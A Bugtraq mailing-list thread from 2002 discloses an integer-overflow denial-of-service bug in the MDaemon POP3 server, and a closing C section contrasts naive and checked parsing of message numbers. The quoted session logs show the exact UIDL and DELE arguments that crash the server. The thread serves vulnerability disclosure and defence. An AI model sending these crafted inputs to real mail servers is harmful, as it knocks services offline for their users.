I'm running MDaemon 3.1.2 and this does not have any adverse effect. Here's my
log:

+OK daisydata.com POP3 server ready <MDAEMON-F200210291127.AA274532MD3626@mydomain.com>
USER myusername
+OK myusername... Recipient ok
PASS mypassword
+OK myusername@mydomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648
UIDL 2147483649
+OK -2147483647
UIDL 2147483650
+OK -2147483646

And it responds to "QUIT" just fine.

Bob Feldbauer
wuher@swrpg.net

> -----Original Message-----
> From: Basil Hussain [mailto:basil.hussain@kodakweddings.com]
> Sent: Tuesday, October 29, 2002 5:27 AM
> To: bugtraq@securityfocus.com
> Subject: RE: MDaemon SMTP/POP/IMAP server DoS
>
>
> Hi all,
>
> > Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
> > sending long arguments (32b and above) with DELE or UIDL commands.
> > To do this you must have at least mail-account on vulnerable host.
> > After getting long request from client, all MDaemon's Services will be
> > closed (smtp, imap, pop, (?)worldclient).
> > Here is the log of attack on local MDaemon POP-server:
> >
> > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> > <MDAEMON-F200210271036.AA3656130MD0012@dark.ru>
> > USER D4rkGr3y
> > +OK D4rkGr3y... Recipient ok
> > PASS cool-pass
> > +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
> > UIDL 11111111111111111111111111111111
>
> It would appear this is not an issue with the length of string passed to
> MDaemon, but rather an integer overflow problem. After some testing, I've
> discovered that if you pass any number greater than 2147483647 (the limit
> for a signed 4-byte integer), you either get an error or a complete crash
> of MDaemon. For example:
>
> +OK somedomain.com POP MDaemon 6.0.5 ready
> <MDAEMON-F200210290951.AA5138234MD2795@somedomain.com>
> USER blah
> +OK blah... Recipient ok
> PASS 123456
> +OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
> UIDL 2147483647
> -ERR no such message
> UIDL 2147483648
> +OK -2147483648 !!! Index 0 is not used
> UIDL 2147483649
>
> [Connection lost at this point...]
>
> By the way, you may have noticed this also works with a slightly older
> release (6.0.5). Also, hostname and account details have been changed to
> protect the guilty... :-)
>
> Also, I don't know whether this was something with how my test W2K server
> was set up, but MDaemon would auto-restart afterwards, thus making this bug
> not so much of a show-stopper and limiting scope for a Denial-of-Service
> attack somewhat.
>
> Regards,
> Basil Hussain
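
The negative numbers in both logs are what a 32-bit signed conversion of the UIDL argument produces. The C below is an added illustration, not MDaemon's code and not written by either poster: `parse_msgnum_naive` is a hypothetical parser that reproduces the logged values, and `parse_msgnum_checked` is one way to reject the same arguments before they reach a mailbox index.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical naive parser (an assumption, not MDaemon's code): digits are
 * accumulated modulo 2^32 and the result is treated as a signed 32-bit int.
 * The out-of-range cast wraps on two's-complement compilers such as gcc/clang. */
static int32_t parse_msgnum_naive(const char *arg)
{
    uint32_t v = 0;
    for (; *arg >= '0' && *arg <= '9'; arg++)
        v = v * 10u + (uint32_t)(*arg - '0');
    return (int32_t)v;
}

/* Checked parser: accepts only decimal digits naming a message in
 * 1..msg_count. Returns 0 and stores the number in *out, or -1 to reject
 * (the caller would answer "-ERR no such message"). */
static int parse_msgnum_checked(const char *arg, long msg_count, long *out)
{
    char *end;
    unsigned long long v;

    if (msg_count < 0 || *arg < '0' || *arg > '9')
        return -1;                       /* empty, signed or non-numeric */
    errno = 0;
    v = strtoull(arg, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                       /* too long, or trailing junk */
    if (v < 1 || v > (unsigned long long)msg_count)
        return -1;                       /* outside the mailbox */
    *out = (long)v;
    return 0;
}

int main(void)
{
    /* Arguments taken from the logs in this thread. */
    const char *args[] = { "2147483647", "2147483648", "2147483650",
                           "11111111111111111111111111111111" };
    long n = 0;
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++)
        printf("%-34s naive=%ld checked=%s\n", args[i],
               (long)parse_msgnum_naive(args[i]),
               parse_msgnum_checked(args[i], 1, &n) ? "reject" : "accept");
    return 0;
}
```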